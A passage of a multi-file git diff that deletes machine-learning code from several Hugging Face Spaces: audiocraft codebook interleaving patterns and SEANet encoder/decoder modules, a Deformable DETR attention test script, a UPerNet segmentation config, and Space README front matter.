Interleaved sequence matching the pattern, of shape [B, K, S] with S - corresponding either to the sequence_steps if provided, otherwise to the length of the pattern. - indexes (torch.Tensor): Indexes corresponding to the interleaved sequence, of shape [K, S]. - mask (torch.Tensor): Mask corresponding to indexes that matches valid indexes of shape [K, S]. - """ - B, K, T = z.shape - indexes, mask = self._build_pattern_sequence_scatter_indexes( - T, K, keep_only_valid_steps=keep_only_valid_steps, device=str(z.device) - ) - z = z.view(B, -1) - # we append the special token as the last index of our flattened z tensor - z = torch.cat([z, torch.zeros_like(z[:, :1]) + special_token], dim=1) - values = z[:, indexes.view(-1)] - values = values.view(B, K, indexes.shape[-1]) - return values, indexes, mask - - def _build_reverted_sequence_scatter_indexes(self, sequence_steps: int, n_q: int, - keep_only_valid_steps: bool = False, - is_model_output: bool = False, - device: tp.Union[torch.device, str] = 'cpu'): - """Builds scatter indexes required to retrieve the original multi-codebook sequence - from interleaving pattern. - - Args: - sequence_steps (int): Sequence steps. - n_q (int): Number of codebooks. - keep_only_valid_steps (bool): Build a sequence from the pattern up to valid (= fully defined) steps. - Steps that are beyond valid steps will be replaced by the special_token in that case. - is_model_output (bool): Whether to keep the sequence item corresponding to initial special token or not. - device (Union[torch.device, str]): Device for created tensors. - Returns: - torch.Tensor: Indexes for reconstructing the output, of shape [K, T]. - mask (torch.Tensor): Mask corresponding to indexes that matches valid indexes of shape [K, T]. - """ - ref_layout = self.valid_layout if keep_only_valid_steps else self.layout - # TODO(jade): Do we want to further truncate to only valid timesteps here as well? - timesteps = self.timesteps - assert n_q == self.n_q, f"invalid number of codebooks for the sequence and the pattern: {n_q} != {self.n_q}" - assert sequence_steps <= len(ref_layout), \ - f"sequence to revert is longer than the defined pattern: {sequence_steps} > {len(ref_layout)}" - - # ensure we take the appropriate indexes to keep the model output from the first special token as well - if is_model_output: - ref_layout = ref_layout[1:] - - # single item indexing being super slow with pytorch vs. numpy, so we use numpy here - indexes = torch.zeros(n_q, timesteps, dtype=torch.long).numpy() - mask = torch.zeros(n_q, timesteps, dtype=torch.bool).numpy() - # fill indexes with last sequence step value that will correspond to our special token - indexes[:] = n_q * sequence_steps - for s, sequence_codes in enumerate(ref_layout): - if s < sequence_steps: - for code in sequence_codes: - if code.t < timesteps: - indexes[code.q, code.t] = s + code.q * sequence_steps - mask[code.q, code.t] = 1 - indexes = torch.from_numpy(indexes).to(device) - mask = torch.from_numpy(mask).to(device) - return indexes, mask - - def revert_pattern_sequence(self, s: torch.Tensor, special_token: int, keep_only_valid_steps: bool = False): - """Revert a sequence built from the pattern back to the original multi-codebook sequence without interleaving. - The sequence is reverted using up to timesteps if specified, and non-pattern coordinates - are filled with the special token. - - Args: - s (torch.Tensor): Interleaved sequence tensor obtained from the pattern, of shape [B, K, S]. - special_token (int or float): Special token used to fill non-pattern coordinates in the new sequence. - Returns: - values (torch.Tensor): Interleaved sequence matching the pattern, of shape [B, K, T] with T - corresponding either to the timesteps if provided, or the total timesteps in pattern otherwise. - indexes (torch.Tensor): Indexes corresponding to the interleaved sequence, of shape [K, T]. - mask (torch.Tensor): Mask corresponding to indexes that matches valid indexes of shape [K, T]. - """ - B, K, S = s.shape - indexes, mask = self._build_reverted_sequence_scatter_indexes( - S, K, keep_only_valid_steps, is_model_output=False, device=str(s.device) - ) - s = s.view(B, -1) - # we append the special token as the last index of our flattened z tensor - s = torch.cat([s, torch.zeros_like(s[:, :1]) + special_token], dim=1) - values = s[:, indexes.view(-1)] - values = values.view(B, K, indexes.shape[-1]) - return values, indexes, mask - - def revert_pattern_logits(self, logits: torch.Tensor, special_token: float, keep_only_valid_steps: bool = False): - """Revert model logits obtained on a sequence built from the pattern - back to a tensor matching the original sequence. - - This method is similar to ``revert_pattern_sequence`` with the following specificities: - 1. It is designed to work with the extra cardinality dimension - 2. We return the logits for the first sequence item that matches the special_token and - which matching target in the original sequence is the first item of the sequence, - while we skip the last logits as there is no matching target - """ - B, card, K, S = logits.shape - indexes, mask = self._build_reverted_sequence_scatter_indexes( - S, K, keep_only_valid_steps, is_model_output=True, device=logits.device - ) - logits = logits.reshape(B, card, -1) - # we append the special token as the last index of our flattened z tensor - logits = torch.cat([logits, torch.zeros_like(logits[:, :, :1]) + special_token], dim=-1) # [B, card, K x S] - values = logits[:, :, indexes.view(-1)] - values = values.view(B, card, K, indexes.shape[-1]) - return values, indexes, mask - - -class CodebooksPatternProvider(ABC): - """Abstraction around providing pattern for interleaving codebooks. - - The CodebooksPatternProvider abstraction allows to implement various strategies to - define interleaving pattern of sequences composed of multiple codebooks. For a given - number of codebooks `n_q`, the pattern provider can generate a specified pattern - corresponding to a sequence of `T` timesteps with `n_q` parallel codebooks. This pattern - can be used to construct a new sequence from the original codes respecting the specified - pattern. The pattern is defined as a list of list of code coordinates, code coordinate - being a tuple with the original timestep and codebook to build the new sequence. - Note that all patterns must start with an empty list that is then used to insert a first - sequence step of special tokens in the newly generated sequence. - - Args: - n_q (int): number of codebooks. - cached (bool): if True, patterns for a given length are cached. In general - that should be true for efficiency reason to avoid synchronization points. - """ - def __init__(self, n_q: int, cached: bool = True): - assert n_q > 0 - self.n_q = n_q - self.get_pattern = lru_cache(100)(self.get_pattern) # type: ignore - - @abstractmethod - def get_pattern(self, timesteps: int) -> Pattern: - """Builds pattern with specific interleaving between codebooks. - - Args: - timesteps (int): Total numer of timesteps. - """ - raise NotImplementedError() - - -class DelayedPatternProvider(CodebooksPatternProvider): - """Provider for delayed pattern across delayed codebooks. - Codebooks are delayed in the sequence and sequence steps will contain codebooks - from different timesteps. - - Example: - Taking timesteps=4 and n_q=3, delays=None, the multi-codebook sequence: - [[1, 2, 3, 4], - [1, 2, 3, 4], - [1, 2, 3, 4]] - The resulting sequence obtained from the returned pattern is: - [[S, 1, 2, 3, 4], - [S, S, 1, 2, 3], - [S, S, S, 1, 2]] - (with S being a special token) - - Args: - n_q (int): Number of codebooks. - delays (Optional[List[int]]): Delay for each of the codebooks. - If delays not defined, each codebook is delayed by 1 compared to the previous one. - flatten_first (int): Flatten the first N timesteps. - empty_initial (int): Prepend with N empty list of coordinates. - """ - def __init__(self, n_q: int, delays: tp.Optional[tp.List[int]] = None, - flatten_first: int = 0, empty_initial: int = 0): - super().__init__(n_q) - if delays is None: - delays = list(range(n_q)) - self.delays = delays - self.flatten_first = flatten_first - self.empty_initial = empty_initial - assert len(self.delays) == self.n_q - assert sorted(self.delays) == self.delays - - def get_pattern(self, timesteps: int) -> Pattern: - out: PatternLayout = [[]] - max_delay = max(self.delays) - if self.empty_initial: - out += [[] for _ in range(self.empty_initial)] - if self.flatten_first: - for t in range(min(timesteps, self.flatten_first)): - for q in range(self.n_q): - out.append([LayoutCoord(t, q)]) - for t in range(self.flatten_first, timesteps + max_delay): - v = [] - for q, delay in enumerate(self.delays): - t_for_q = t - delay - if t_for_q >= self.flatten_first: - v.append(LayoutCoord(t_for_q, q)) - out.append(v) - return Pattern(out, n_q=self.n_q, timesteps=timesteps) - - -class ParallelPatternProvider(DelayedPatternProvider): - """Provider for parallel pattern across codebooks. - This pattern provider is a special case of the delayed pattern with actually no delay, - hence delays=repeat(0, n_q). - - Args: - n_q (int): Number of codebooks. - """ - def __init__(self, n_q: int): - super().__init__(n_q, [0] * n_q) - - -class UnrolledPatternProvider(CodebooksPatternProvider): - """Provider for unrolling codebooks pattern. - This pattern provider enables to represent the codebook flattened completely or only to some extend - while also specifying a given delay between the flattened codebooks representation, allowing to - unroll the codebooks in the sequence. - - Example: - 1. Flattening of the codebooks. - By default, the pattern provider will fully flatten the codebooks such as flattening=range(n_q), - taking n_q = 3 and timesteps = 4: - [[1, 2, 3, 4], - [1, 2, 3, 4], - [1, 2, 3, 4]] - will result into: - [[S, S, 1, S, S, 2, S, S, 3, S, S, 4], - [S, 1, S, S, 2, S, S, 3, S, S, 4, S], - [1, S, S, 2, S, S, 3, S, S, 4, S, S]] - 2. Partial flattening of the codebooks. The ``flattening`` parameter allows to specify the inner step - for each of the codebook, allowing to define which codebook to flatten (or keep in parallel), for example - taking n_q = 3, timesteps = 4 and flattening = [0, 1, 1]: - [[1, 2, 3, 4], - [1, 2, 3, 4], - [1, 2, 3, 4]] - will result into: - [[S, 1, S, S, 2, S, S, 3, S, S, 4, S], - [S, 1, S, S, 2, S, S, 3, S, S, 4, S], - [1, S, S, 2, S, S, 3, S, S, 4, S, S]] - 3. Flattening with delay. The ``delay`` parameter allows to further unroll the sequence of codebooks - allowing to specify the delay per codebook. Note that the delay between codebooks flattened to the - same inner timestep should be coherent. For example, taking n_q = 3, timesteps = 4, flattening = [0, 1, 1] - and delays = [0, 3, 3]: - [[1, 2, 3, 4], - [1, 2, 3, 4], - [1, 2, 3, 4]] - will result into: - [[S, S, S, 1, S, 2, S, 3, S, 4], - [S, S, S, 1, S, 2, S, 3, S, 4], - [1, 2, 3, S, 4, S, 5, S, 6, S]] - - Args: - n_q (int): Number of codebooks. - flattening (Optional[List[int]]): Flattening schema over the codebooks. If not defined, - the codebooks will be flattened to 1 codebook per step, meaning that the sequence will - have n_q extra steps for each timestep. - delays (Optional[List[int]]): Delay for each of the codebooks. If not defined, - no delay is added and therefore will default to [0] * ``n_q``. - Note that two codebooks that will be flattened to the same inner step - should have the same delay, otherwise the pattern is considered as invalid. - """ - FlattenedCodebook = namedtuple('FlattenedCodebook', ['codebooks', 'delay']) - - def __init__(self, n_q: int, flattening: tp.Optional[tp.List[int]] = None, - delays: tp.Optional[tp.List[int]] = None): - super().__init__(n_q) - if flattening is None: - flattening = list(range(n_q)) - if delays is None: - delays = [0] * n_q - assert len(flattening) == n_q - assert len(delays) == n_q - assert sorted(flattening) == flattening - assert sorted(delays) == delays - self._flattened_codebooks = self._build_flattened_codebooks(delays, flattening) - self.max_delay = max(delays) - - def _build_flattened_codebooks(self, delays: tp.List[int], flattening: tp.List[int]): - """Build a flattened codebooks representation as a dictionary of inner step - and the actual codebook indices corresponding to the flattened codebook. For convenience, we - also store the delay associated to the flattened codebook to avoid maintaining an extra mapping. - """ - flattened_codebooks: dict = {} - for q, (inner_step, delay) in enumerate(zip(flattening, delays)): - if inner_step not in flattened_codebooks: - flat_codebook = UnrolledPatternProvider.FlattenedCodebook(codebooks=[q], delay=delay) - else: - flat_codebook = flattened_codebooks[inner_step] - assert flat_codebook.delay == delay, ( - "Delay and flattening between codebooks is inconsistent: ", - "two codebooks flattened to the same position should have the same delay." - ) - flat_codebook.codebooks.append(q) - flattened_codebooks[inner_step] = flat_codebook - return flattened_codebooks - - @property - def _num_inner_steps(self): - """Number of inner steps to unroll between timesteps in order to flatten the codebooks. - """ - return max([inner_step for inner_step in self._flattened_codebooks.keys()]) + 1 - - def num_virtual_steps(self, timesteps: int) -> int: - return timesteps * self._num_inner_steps + 1 - - def get_pattern(self, timesteps: int) -> Pattern: - """Builds pattern for delay across codebooks. - - Args: - timesteps (int): Total numer of timesteps. - """ - # the PatternLayout is built as a tuple of sequence position and list of coordinates - # so that it can be reordered properly given the required delay between codebooks of given timesteps - indexed_out: list = [(-1, [])] - max_timesteps = timesteps + self.max_delay - for t in range(max_timesteps): - # for each timestep, we unroll the flattened codebooks, - # emitting the sequence step with the corresponding delay - for step in range(self._num_inner_steps): - if step in self._flattened_codebooks: - # we have codebooks at this virtual step to emit - step_codebooks = self._flattened_codebooks[step] - t_for_q = t + step_codebooks.delay - coords = [LayoutCoord(t, q) for q in step_codebooks.codebooks] - if t_for_q < max_timesteps and t < max_timesteps: - indexed_out.append((t_for_q, coords)) - else: - # there is no codebook in this virtual step so we emit an empty list - indexed_out.append((t, [])) - out = [coords for _, coords in sorted(indexed_out)] - return Pattern(out, n_q=self.n_q, timesteps=timesteps) - - -class VALLEPattern(CodebooksPatternProvider): - """Almost VALL-E style pattern. We futher allow some delays for the - codebooks other than the first one. - - Args: - n_q (int): Number of codebooks. - delays (Optional[List[int]]): Delay for each of the codebooks. - If delays not defined, each codebook is delayed by 1 compared to the previous one. - """ - def __init__(self, n_q: int, delays: tp.Optional[tp.List[int]] = None): - super().__init__(n_q) - if delays is None: - delays = [0] * (n_q - 1) - self.delays = delays - assert len(self.delays) == self.n_q - 1 - assert sorted(self.delays) == self.delays - - def get_pattern(self, timesteps: int) -> Pattern: - out: PatternLayout = [[]] - for t in range(timesteps): - out.append([LayoutCoord(t, 0)]) - max_delay = max(self.delays) - for t in range(timesteps + max_delay): - v = [] - for q, delay in enumerate(self.delays): - t_for_q = t - delay - if t_for_q >= 0: - v.append(LayoutCoord(t_for_q, q + 1)) - out.append(v) - return Pattern(out, n_q=self.n_q, timesteps=timesteps) - - -class MusicLMPattern(CodebooksPatternProvider): - """Almost MusicLM style pattern. This is equivalent to full flattening - but in a different order. - - Args: - n_q (int): Number of codebooks. - group_by (int): Number of codebooks to group together. - """ - def __init__(self, n_q: int, group_by: int = 2): - super().__init__(n_q) - self.group_by = group_by - - def get_pattern(self, timesteps: int) -> Pattern: - out: PatternLayout = [[]] - for offset in range(0, self.n_q, self.group_by): - for t in range(timesteps): - for q in range(offset, offset + self.group_by): - out.append([LayoutCoord(t, q)]) - return Pattern(out, n_q=self.n_q, timesteps=timesteps) diff --git a/spaces/Suniilkumaar/MusicGen-updated/audiocraft/modules/seanet.py b/spaces/Suniilkumaar/MusicGen-updated/audiocraft/modules/seanet.py deleted file mode 100644 index 3e5998e9153afb6e68ea410d565e00ea835db248..0000000000000000000000000000000000000000 --- a/spaces/Suniilkumaar/MusicGen-updated/audiocraft/modules/seanet.py +++ /dev/null @@ -1,258 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import typing as tp - -import numpy as np -import torch.nn as nn - -from .conv import StreamableConv1d, StreamableConvTranspose1d -from .lstm import StreamableLSTM - - -class SEANetResnetBlock(nn.Module): - """Residual block from SEANet model. - - Args: - dim (int): Dimension of the input/output. - kernel_sizes (list): List of kernel sizes for the convolutions. - dilations (list): List of dilations for the convolutions. - activation (str): Activation function. - activation_params (dict): Parameters to provide to the activation function. - norm (str): Normalization method. - norm_params (dict): Parameters to provide to the underlying normalization used along with the convolution. - causal (bool): Whether to use fully causal convolution. - pad_mode (str): Padding mode for the convolutions. - compress (int): Reduced dimensionality in residual branches (from Demucs v3). - true_skip (bool): Whether to use true skip connection or a simple - (streamable) convolution as the skip connection. - """ - def __init__(self, dim: int, kernel_sizes: tp.List[int] = [3, 1], dilations: tp.List[int] = [1, 1], - activation: str = 'ELU', activation_params: dict = {'alpha': 1.0}, - norm: str = 'none', norm_params: tp.Dict[str, tp.Any] = {}, causal: bool = False, - pad_mode: str = 'reflect', compress: int = 2, true_skip: bool = True): - super().__init__() - assert len(kernel_sizes) == len(dilations), 'Number of kernel sizes should match number of dilations' - act = getattr(nn, activation) - hidden = dim // compress - block = [] - for i, (kernel_size, dilation) in enumerate(zip(kernel_sizes, dilations)): - in_chs = dim if i == 0 else hidden - out_chs = dim if i == len(kernel_sizes) - 1 else hidden - block += [ - act(**activation_params), - StreamableConv1d(in_chs, out_chs, kernel_size=kernel_size, dilation=dilation, - norm=norm, norm_kwargs=norm_params, - causal=causal, pad_mode=pad_mode), - ] - self.block = nn.Sequential(*block) - self.shortcut: nn.Module - if true_skip: - self.shortcut = nn.Identity() - else: - self.shortcut = StreamableConv1d(dim, dim, kernel_size=1, norm=norm, norm_kwargs=norm_params, - causal=causal, pad_mode=pad_mode) - - def forward(self, x): - return self.shortcut(x) + self.block(x) - - -class SEANetEncoder(nn.Module): - """SEANet encoder. - - Args: - channels (int): Audio channels. - dimension (int): Intermediate representation dimension. - n_filters (int): Base width for the model. - n_residual_layers (int): nb of residual layers. - ratios (Sequence[int]): kernel size and stride ratios. The encoder uses downsampling ratios instead of - upsampling ratios, hence it will use the ratios in the reverse order to the ones specified here - that must match the decoder order. We use the decoder order as some models may only employ the decoder. - activation (str): Activation function. - activation_params (dict): Parameters to provide to the activation function. - norm (str): Normalization method. - norm_params (dict): Parameters to provide to the underlying normalization used along with the convolution. - kernel_size (int): Kernel size for the initial convolution. - last_kernel_size (int): Kernel size for the initial convolution. - residual_kernel_size (int): Kernel size for the residual layers. - dilation_base (int): How much to increase the dilation with each layer. - causal (bool): Whether to use fully causal convolution. - pad_mode (str): Padding mode for the convolutions. - true_skip (bool): Whether to use true skip connection or a simple - (streamable) convolution as the skip connection in the residual network blocks. - compress (int): Reduced dimensionality in residual branches (from Demucs v3). - lstm (int): Number of LSTM layers at the end of the encoder. - disable_norm_outer_blocks (int): Number of blocks for which we don't apply norm. - For the encoder, it corresponds to the N first blocks. - """ - def __init__(self, channels: int = 1, dimension: int = 128, n_filters: int = 32, n_residual_layers: int = 3, - ratios: tp.List[int] = [8, 5, 4, 2], activation: str = 'ELU', activation_params: dict = {'alpha': 1.0}, - norm: str = 'none', norm_params: tp.Dict[str, tp.Any] = {}, kernel_size: int = 7, - last_kernel_size: int = 7, residual_kernel_size: int = 3, dilation_base: int = 2, causal: bool = False, - pad_mode: str = 'reflect', true_skip: bool = True, compress: int = 2, lstm: int = 0, - disable_norm_outer_blocks: int = 0): - super().__init__() - self.channels = channels - self.dimension = dimension - self.n_filters = n_filters - self.ratios = list(reversed(ratios)) - del ratios - self.n_residual_layers = n_residual_layers - self.hop_length = np.prod(self.ratios) - self.n_blocks = len(self.ratios) + 2 # first and last conv + residual blocks - self.disable_norm_outer_blocks = disable_norm_outer_blocks - assert self.disable_norm_outer_blocks >= 0 and self.disable_norm_outer_blocks <= self.n_blocks, \ - "Number of blocks for which to disable norm is invalid." \ - "It should be lower or equal to the actual number of blocks in the network and greater or equal to 0." - - act = getattr(nn, activation) - mult = 1 - model: tp.List[nn.Module] = [ - StreamableConv1d(channels, mult * n_filters, kernel_size, - norm='none' if self.disable_norm_outer_blocks >= 1 else norm, - norm_kwargs=norm_params, causal=causal, pad_mode=pad_mode) - ] - # Downsample to raw audio scale - for i, ratio in enumerate(self.ratios): - block_norm = 'none' if self.disable_norm_outer_blocks >= i + 2 else norm - # Add residual layers - for j in range(n_residual_layers): - model += [ - SEANetResnetBlock(mult * n_filters, kernel_sizes=[residual_kernel_size, 1], - dilations=[dilation_base ** j, 1], - norm=block_norm, norm_params=norm_params, - activation=activation, activation_params=activation_params, - causal=causal, pad_mode=pad_mode, compress=compress, true_skip=true_skip)] - - # Add downsampling layers - model += [ - act(**activation_params), - StreamableConv1d(mult * n_filters, mult * n_filters * 2, - kernel_size=ratio * 2, stride=ratio, - norm=block_norm, norm_kwargs=norm_params, - causal=causal, pad_mode=pad_mode), - ] - mult *= 2 - - if lstm: - model += [StreamableLSTM(mult * n_filters, num_layers=lstm)] - - model += [ - act(**activation_params), - StreamableConv1d(mult * n_filters, dimension, last_kernel_size, - norm='none' if self.disable_norm_outer_blocks == self.n_blocks else norm, - norm_kwargs=norm_params, causal=causal, pad_mode=pad_mode) - ] - - self.model = nn.Sequential(*model) - - def forward(self, x): - return self.model(x) - - -class SEANetDecoder(nn.Module): - """SEANet decoder. - - Args: - channels (int): Audio channels. - dimension (int): Intermediate representation dimension. - n_filters (int): Base width for the model. - n_residual_layers (int): nb of residual layers. - ratios (Sequence[int]): kernel size and stride ratios. - activation (str): Activation function. - activation_params (dict): Parameters to provide to the activation function. - final_activation (str): Final activation function after all convolutions. - final_activation_params (dict): Parameters to provide to the activation function. - norm (str): Normalization method. - norm_params (dict): Parameters to provide to the underlying normalization used along with the convolution. - kernel_size (int): Kernel size for the initial convolution. - last_kernel_size (int): Kernel size for the initial convolution. - residual_kernel_size (int): Kernel size for the residual layers. - dilation_base (int): How much to increase the dilation with each layer. - causal (bool): Whether to use fully causal convolution. - pad_mode (str): Padding mode for the convolutions. - true_skip (bool): Whether to use true skip connection or a simple. - (streamable) convolution as the skip connection in the residual network blocks. - compress (int): Reduced dimensionality in residual branches (from Demucs v3). - lstm (int): Number of LSTM layers at the end of the encoder. - disable_norm_outer_blocks (int): Number of blocks for which we don't apply norm. - For the decoder, it corresponds to the N last blocks. - trim_right_ratio (float): Ratio for trimming at the right of the transposed convolution under the causal setup. - If equal to 1.0, it means that all the trimming is done at the right. - """ - def __init__(self, channels: int = 1, dimension: int = 128, n_filters: int = 32, n_residual_layers: int = 3, - ratios: tp.List[int] = [8, 5, 4, 2], activation: str = 'ELU', activation_params: dict = {'alpha': 1.0}, - final_activation: tp.Optional[str] = None, final_activation_params: tp.Optional[dict] = None, - norm: str = 'none', norm_params: tp.Dict[str, tp.Any] = {}, kernel_size: int = 7, - last_kernel_size: int = 7, residual_kernel_size: int = 3, dilation_base: int = 2, causal: bool = False, - pad_mode: str = 'reflect', true_skip: bool = True, compress: int = 2, lstm: int = 0, - disable_norm_outer_blocks: int = 0, trim_right_ratio: float = 1.0): - super().__init__() - self.dimension = dimension - self.channels = channels - self.n_filters = n_filters - self.ratios = ratios - del ratios - self.n_residual_layers = n_residual_layers - self.hop_length = np.prod(self.ratios) - self.n_blocks = len(self.ratios) + 2 # first and last conv + residual blocks - self.disable_norm_outer_blocks = disable_norm_outer_blocks - assert self.disable_norm_outer_blocks >= 0 and self.disable_norm_outer_blocks <= self.n_blocks, \ - "Number of blocks for which to disable norm is invalid." \ - "It should be lower or equal to the actual number of blocks in the network and greater or equal to 0." - - act = getattr(nn, activation) - mult = int(2 ** len(self.ratios)) - model: tp.List[nn.Module] = [ - StreamableConv1d(dimension, mult * n_filters, kernel_size, - norm='none' if self.disable_norm_outer_blocks == self.n_blocks else norm, - norm_kwargs=norm_params, causal=causal, pad_mode=pad_mode) - ] - - if lstm: - model += [StreamableLSTM(mult * n_filters, num_layers=lstm)] - - # Upsample to raw audio scale - for i, ratio in enumerate(self.ratios): - block_norm = 'none' if self.disable_norm_outer_blocks >= self.n_blocks - (i + 1) else norm - # Add upsampling layers - model += [ - act(**activation_params), - StreamableConvTranspose1d(mult * n_filters, mult * n_filters // 2, - kernel_size=ratio * 2, stride=ratio, - norm=block_norm, norm_kwargs=norm_params, - causal=causal, trim_right_ratio=trim_right_ratio), - ] - # Add residual layers - for j in range(n_residual_layers): - model += [ - SEANetResnetBlock(mult * n_filters // 2, kernel_sizes=[residual_kernel_size, 1], - dilations=[dilation_base ** j, 1], - activation=activation, activation_params=activation_params, - norm=block_norm, norm_params=norm_params, causal=causal, - pad_mode=pad_mode, compress=compress, true_skip=true_skip)] - - mult //= 2 - - # Add final layers - model += [ - act(**activation_params), - StreamableConv1d(n_filters, channels, last_kernel_size, - norm='none' if self.disable_norm_outer_blocks >= 1 else norm, - norm_kwargs=norm_params, causal=causal, pad_mode=pad_mode) - ] - # Add optional final activation to decoder (eg. tanh) - if final_activation is not None: - final_act = getattr(nn, final_activation) - final_activation_params = final_activation_params or {} - model += [ - final_act(**final_activation_params) - ] - self.model = nn.Sequential(*model) - - def forward(self, z): - y = self.model(z) - return y diff --git a/spaces/Superlang/ImageProcessor/annotator/oneformer/oneformer/modeling/pixel_decoder/ops/test.py b/spaces/Superlang/ImageProcessor/annotator/oneformer/oneformer/modeling/pixel_decoder/ops/test.py deleted file mode 100644 index 6e1b545459f6fd3235767e721eb5a1090ae14bef..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/oneformer/oneformer/modeling/pixel_decoder/ops/test.py +++ /dev/null @@ -1,92 +0,0 @@ -# ------------------------------------------------------------------------------------------------ -# Deformable DETR -# Copyright (c) 2020 SenseTime. All Rights Reserved. -# Licensed under the Apache License, Version 2.0 [see LICENSE for details] -# ------------------------------------------------------------------------------------------------ -# Modified from https://github.com/chengdazhi/Deformable-Convolution-V2-PyTorch/tree/pytorch_1.0.0 -# ------------------------------------------------------------------------------------------------ - -# Copyright (c) Facebook, Inc. and its affiliates. -# Modified by Bowen Cheng from https://github.com/fundamentalvision/Deformable-DETR - -from __future__ import absolute_import -from __future__ import print_function -from __future__ import division - -import time -import torch -import torch.nn as nn -from torch.autograd import gradcheck - -from functions.ms_deform_attn_func import MSDeformAttnFunction, ms_deform_attn_core_pytorch - - -N, M, D = 1, 2, 2 -Lq, L, P = 2, 2, 2 -shapes = torch.as_tensor([(6, 4), (3, 2)], dtype=torch.long).cuda() -level_start_index = torch.cat((shapes.new_zeros((1, )), shapes.prod(1).cumsum(0)[:-1])) -S = sum([(H*W).item() for H, W in shapes]) - - -torch.manual_seed(3) - - -@torch.no_grad() -def check_forward_equal_with_pytorch_double(): - value = torch.rand(N, S, M, D).cuda() * 0.01 - sampling_locations = torch.rand(N, Lq, M, L, P, 2).cuda() - attention_weights = torch.rand(N, Lq, M, L, P).cuda() + 1e-5 - attention_weights /= attention_weights.sum(-1, keepdim=True).sum(-2, keepdim=True) - im2col_step = 2 - output_pytorch = ms_deform_attn_core_pytorch(value.double(), shapes, sampling_locations.double(), attention_weights.double()).detach().cpu() - output_cuda = MSDeformAttnFunction.apply(value.double(), shapes, level_start_index, sampling_locations.double(), attention_weights.double(), im2col_step).detach().cpu() - fwdok = torch.allclose(output_cuda, output_pytorch) - max_abs_err = (output_cuda - output_pytorch).abs().max() - max_rel_err = ((output_cuda - output_pytorch).abs() / output_pytorch.abs()).max() - - print(f'* {fwdok} check_forward_equal_with_pytorch_double: max_abs_err {max_abs_err:.2e} max_rel_err {max_rel_err:.2e}') - - -@torch.no_grad() -def check_forward_equal_with_pytorch_float(): - value = torch.rand(N, S, M, D).cuda() * 0.01 - sampling_locations = torch.rand(N, Lq, M, L, P, 2).cuda() - attention_weights = torch.rand(N, Lq, M, L, P).cuda() + 1e-5 - attention_weights /= attention_weights.sum(-1, keepdim=True).sum(-2, keepdim=True) - im2col_step = 2 - output_pytorch = ms_deform_attn_core_pytorch(value, shapes, sampling_locations, attention_weights).detach().cpu() - output_cuda = MSDeformAttnFunction.apply(value, shapes, level_start_index, sampling_locations, attention_weights, im2col_step).detach().cpu() - fwdok = torch.allclose(output_cuda, output_pytorch, rtol=1e-2, atol=1e-3) - max_abs_err = (output_cuda - output_pytorch).abs().max() - max_rel_err = ((output_cuda - output_pytorch).abs() / output_pytorch.abs()).max() - - print(f'* {fwdok} check_forward_equal_with_pytorch_float: max_abs_err {max_abs_err:.2e} max_rel_err {max_rel_err:.2e}') - - -def check_gradient_numerical(channels=4, grad_value=True, grad_sampling_loc=True, grad_attn_weight=True): - - value = torch.rand(N, S, M, channels).cuda() * 0.01 - sampling_locations = torch.rand(N, Lq, M, L, P, 2).cuda() - attention_weights = torch.rand(N, Lq, M, L, P).cuda() + 1e-5 - attention_weights /= attention_weights.sum(-1, keepdim=True).sum(-2, keepdim=True) - im2col_step = 2 - func = MSDeformAttnFunction.apply - - value.requires_grad = grad_value - sampling_locations.requires_grad = grad_sampling_loc - attention_weights.requires_grad = grad_attn_weight - - gradok = gradcheck(func, (value.double(), shapes, level_start_index, sampling_locations.double(), attention_weights.double(), im2col_step)) - - print(f'* {gradok} check_gradient_numerical(D={channels})') - - -if __name__ == '__main__': - check_forward_equal_with_pytorch_double() - check_forward_equal_with_pytorch_float() - - for channels in [30, 32, 64, 71, 1025, 2048, 3096]: - check_gradient_numerical(channels, True, True, True) - - - diff --git a/spaces/Superlang/ImageProcessor/annotator/uniformer/configs/_base_/models/upernet_r50.py b/spaces/Superlang/ImageProcessor/annotator/uniformer/configs/_base_/models/upernet_r50.py deleted file mode 100644 index 10974962fdd7136031fd06de1700f497d355ceaa..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/uniformer/configs/_base_/models/upernet_r50.py +++ /dev/null @@ -1,44 +0,0 @@ -# model settings -norm_cfg = dict(type='SyncBN', requires_grad=True) -model = dict( - type='EncoderDecoder', - pretrained='open-mmlab://resnet50_v1c', - backbone=dict( - type='ResNetV1c', - depth=50, - num_stages=4, - out_indices=(0, 1, 2, 3), - dilations=(1, 1, 1, 1), - strides=(1, 2, 2, 2), - norm_cfg=norm_cfg, - norm_eval=False, - style='pytorch', - contract_dilation=True), - decode_head=dict( - type='UPerHead', - in_channels=[256, 512, 1024, 2048], - in_index=[0, 1, 2, 3], - pool_scales=(1, 2, 3, 6), - channels=512, - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)), - auxiliary_head=dict( - type='FCNHead', - in_channels=1024, - in_index=2, - channels=256, - num_convs=1, - concat_input=False, - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)), - # model training and testing settings - train_cfg=dict(), - test_cfg=dict(mode='whole')) diff --git a/spaces/ThirdEyeData/Next_Failure_Prediction/README.md b/spaces/ThirdEyeData/Next_Failure_Prediction/README.md deleted file mode 100644 index cb6657f9f3244df662cdeed3f6a99fcc94daf305..0000000000000000000000000000000000000000 --- a/spaces/ThirdEyeData/Next_Failure_Prediction/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Next Failure Prediction -emoji: ⚡ -colorFrom: yellow -colorTo: blue -sdk: streamlit -sdk_version: 1.17.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/ThomasSimonini/SmartRobot/README.md b/spaces/ThomasSimonini/SmartRobot/README.md deleted file mode 100644 index 0a8d9bf847a4e027911ce85459dc22971396b381..0000000000000000000000000000000000000000 --- a/spaces/ThomasSimonini/SmartRobot/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: SmartRobot -emoji: 🤖 -colorFrom: blue -colorTo: gray -sdk: static -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/ThunderJames/PhotoRealistic/style.css 